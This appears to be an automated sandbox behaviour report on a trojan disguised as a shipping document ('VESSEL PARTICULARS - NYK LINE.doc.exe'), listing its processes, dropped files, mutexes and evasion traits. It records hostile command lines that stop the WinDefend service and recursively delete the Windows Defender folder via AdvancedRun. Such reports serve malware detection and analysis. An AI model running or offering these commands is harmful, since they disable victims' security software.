                      Source: VESSEL PARTICULARS - NYK LINE.doc.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe 'C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exe'
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Test-Connection www.bing.com
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Test-Connection www.google.com
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Test-Connection www.facebook.com
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Test-Connection www.twitter.com
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\sc.exe' /WindowState 0 /CommandLine 'stop WinDefend' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 6200
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' /WindowState 0 /CommandLine 'rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 1308
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess created: C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess created: C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess created: C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess created: C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess created: C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess created: C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess created: C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Test-Connection www.bing.com
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Test-Connection www.google.com
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Test-Connection www.facebook.com
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Test-Connection www.twitter.com
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\sc.exe' /WindowState 0 /CommandLine 'stop WinDefend' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' /WindowState 0 /CommandLine 'rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess created: C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess created: C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess created: C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess created: C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess created: C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess created: C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 6200
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 1308
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 19_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 21_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\VESSEL PARTICULARS - NYK LINE.doc.exe.logJump to behavior
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeFile created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeJump to behavior
                      Source: classification engineClassification label: mal100.troj.evad.winEXE@35/20@49/2
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 19_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 19_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4124:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6184:120:WilError_01
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeMutant created: \Sessions\1\BaseNamedObjects\Thcyqfmzh
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6904:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5236:120:WilError_01
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 19_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource,
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe, Nzcjjjvlottgiwy.Queues/WatcherQueue.csCryptographic APIs: 'CreateDecryptor'
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exe.0.dr, Nzcjjjvlottgiwy.Queues/WatcherQueue.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.0.VESSEL PARTICULARS - NYK LINE.doc.exe.bb0000.0.unpack, Nzcjjjvlottgiwy.Queues/WatcherQueue.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.VESSEL PARTICULARS - NYK LINE.doc.exe.bb0000.0.unpack, Nzcjjjvlottgiwy.Queues/WatcherQueue.csCryptographic APIs: 'CreateDecryptor'
                      Source: 23.0.VESSEL PARTICULARS - NYK LINE.doc.exe.200000.0.unpack, Nzcjjjvlottgiwy.Queues/WatcherQueue.csCryptographic APIs: 'CreateDecryptor'
                      Source: 23.2.VESSEL PARTICULARS - NYK LINE.doc.exe.200000.0.unpack, Nzcjjjvlottgiwy.Queues/WatcherQueue.csCryptographic APIs: 'CreateDecryptor'
                      Source: 24.2.VESSEL PARTICULARS - NYK LINE.doc.exe.d0000.0.unpack, Nzcjjjvlottgiwy.Queues/WatcherQueue.csCryptographic APIs: 'CreateDecryptor'
                      Source: 24.0.VESSEL PARTICULARS - NYK LINE.doc.exe.d0000.0.unpack, Nzcjjjvlottgiwy.Queues/WatcherQueue.csCryptographic APIs: 'CreateDecryptor'
                      Source: 25.2.VESSEL PARTICULARS - NYK LINE.doc.exe.c0000.0.unpack, Nzcjjjvlottgiwy.Queues/WatcherQueue.csCryptographic APIs: 'CreateDecryptor'
                      Source: 25.0.VESSEL PARTICULARS - NYK LINE.doc.exe.c0000.0.unpack, Nzcjjjvlottgiwy.Queues/WatcherQueue.csCryptographic APIs: 'CreateDecryptor'
                      Source: 26.2.VESSEL PARTICULARS - NYK LINE.doc.exe.2f0000.0.unpack, Nzcjjjvlottgiwy.Queues/WatcherQueue.csCryptographic APIs: 'CreateDecryptor'
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000003.492753441.0000000003EC9000.00000004.00000001.sdmp, AdvancedRun.exe, 00000013.00000000.459126690.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000014.00000002.472251440.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000015.00000000.474256722.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000016.00000000.488640452.000000000040C000.00000002.00020000.sdmp
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 19_2_0040B550 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 19_2_0040B550 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 19_2_0040B50D push ecx; ret
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 21_2_0040B550 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 21_2_0040B550 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 21_2_0040B50D push ecx; ret
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 19_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exeStatic PE information: 0xA040EBAA [Sun Mar 14 03:53:14 2055 UTC]
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeFile created: C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exeJump to dropped file
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeFile created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 19_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Uses an obfuscated file name to hide its real file extension (double extension)Show sources
                      Source: Possible double extension: doc.exeStatic PE information: VESSEL PARTICULARS - NYK LINE.doc.exe
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 19_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
